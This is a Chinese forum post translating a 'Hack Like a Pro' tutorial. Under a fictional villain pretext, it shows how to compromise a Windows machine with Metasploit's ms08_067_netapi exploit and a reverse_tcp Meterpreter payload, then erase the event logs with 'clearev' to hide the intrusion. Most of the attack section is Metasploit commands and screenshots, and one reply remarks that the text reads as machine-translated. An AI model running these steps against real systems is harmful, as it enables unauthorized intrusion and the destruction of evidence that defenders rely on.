首页
论坛
课程
招聘
[翻译]消除浏览痕迹
2019-4-7 13:12 4148

[翻译]消除浏览痕迹

2019-4-7 13:12
4148

掩盖浏览痕迹不会被发现的方法

 

BY OCCUPYTHEWEB
 05/27/2016 3:26 AM
HACK LIKE A PRO
拯救世界免于核毁灭。世人也许不知道你做了什么,但我知道。棒极了!

 ![图片描述](upload/attach/201904/840827_P4UKZR5ZFGS2WKX.png)

既然我们进入了这个恶毒者的电脑,暂时切断了他的核发射能力,我们还必须想方设法掩盖我们的踪迹,让坏蛋以及坏蛋的爪牙无法追踪到我们的善行。
在这次对黑客攻击中,我们将再次进入他的电脑,植入检测仪,并从他的日志文件中删除我们在那里的全部痕迹。启动metasploit,开始删除我们在坏蛋的电脑上的证据。

 

步骤1 .再次破坏他的系统

 

从最初侵入坏蛋电脑的相同攻击开始:

 

exploit/windows/smb/ms08_067_netapi
但是我们不使用VNC有效载荷,而是使用Meterpreter有效载荷。
类型:

 

msf> use exploit/windows/smb/ms08_067_netapi

 ![图片描述](upload/attach/201904/840827_K6CXREE6X33JCZ9.png)

在开始操作之前,让我们进一步了解一下这个漏洞类型:

 

msf exploit(ms08_067_netapi) info
这应该会带来下面的截图提供一些关于这个漏洞的基本信息。可以看到,这种攻击利用了netapi dll中的一个解析缺陷。通过这种方式,可以将我们自己的有效载荷放在系统上,在本例中是Meterpreter。

 ![图片描述](upload/attach/201904/840827_63E42EETK3WSYDS.png)

输入以下命令来加载负载:
msf exploit(ms08_067_netapi) set PAYLOAD windows/meterpreter/reverse_tcp
现在已经有了漏洞和有效负载集,然后需要设置选项。在这种情况下,需要设置LHOST(我们为攻击者)和RHOST(被攻击者,坏蛋计算机)的IP地址。只需输入您和他的计算机的IP地址。

 ![图片描述](upload/attach/201904/840827_JDAGUEBTY37WX5A.png)

步骤2 .控制他的电脑

 

现在我们已经设置好了控制,只需输入:

 

msf exploit(ms08_067_netapi) exploit
如果成功,应该会在屏幕上看到一个Meterpreter提示符。即现在完全控制了坏蛋的系统!

 ![图片描述](upload/attach/201904/840827_5B3ECBEMUM2ERNZ.png)

在meterpreter提示符下,输入:

 

meterpreter > clearev
正如在上面的截图中所看到的,这个命令继续清除我们好战的坏蛋计算机上的事件日志,这样他和他的部下就不会知道我们曾经到过那里。如果我们能看到他电脑上的事件日志,我们就能看到所有的事件都被清除了。

 ![图片描述](upload/attach/201904/840827_S46DVXG2CFZ3HMS.png)

这对保护我们被发现是至关重要的,而且我们可以继续访问他的电脑。一旦他们知道有人入侵了他的电脑,他们很可能会采取措施防止我们再次侵入他们的电脑。


【公告】看雪招聘大学实习生!看雪20年安全圈的口碑,助你快速成长!

上传的附件:
收藏
点赞0
打赏
分享
最新回复 (1)
雪    币: 62
活跃值: 活跃值 (85)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
一首凉凉送给 活跃值 2019-4-7 22:56
2
0
这是机翻吧  emmm
游客
登录 | 注册 方可回帖
返回